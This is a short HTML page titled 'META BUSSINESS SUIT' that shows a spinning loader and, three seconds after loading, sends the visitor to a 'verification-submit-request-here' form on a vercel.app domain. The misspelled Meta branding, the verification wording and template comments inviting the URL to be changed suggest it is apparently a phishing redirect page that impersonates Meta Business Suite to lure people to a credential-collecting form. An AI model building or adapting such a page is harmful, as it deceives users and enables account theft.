<html>
<head>
  <title> META BUSSINESS SUIT </title>
  <style>
    .loader {
      border: 5px solid #f3f3f3; /* Light grey */
      border-top: 5px solid #3498db; /* Light blue */
      border-radius: 50%;
      width: 50px;
      height: 50px;
      animation: spin 2s linear infinite;
      position: absolute; /* Set the position to absolute */
      top: 0; /* Set the top to 0 */
      left: 0; /* Set the left to 0 */
      right: 0; /* Set the right to 0 */
      bottom: 0; /* Set the bottom to 0 */
      margin: auto; /* Center the loader */
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
  <script>
    window.onload = function() {
        setTimeout(function() {
            window.location.href = 'https://verification-submit-request-here.vercel.app/form.html'; // Change to your desired URL
        }, 3000); // Change delay as needed
    }
</script>
</head>
<body>
  <div class="loader"></div>
</body>
</html>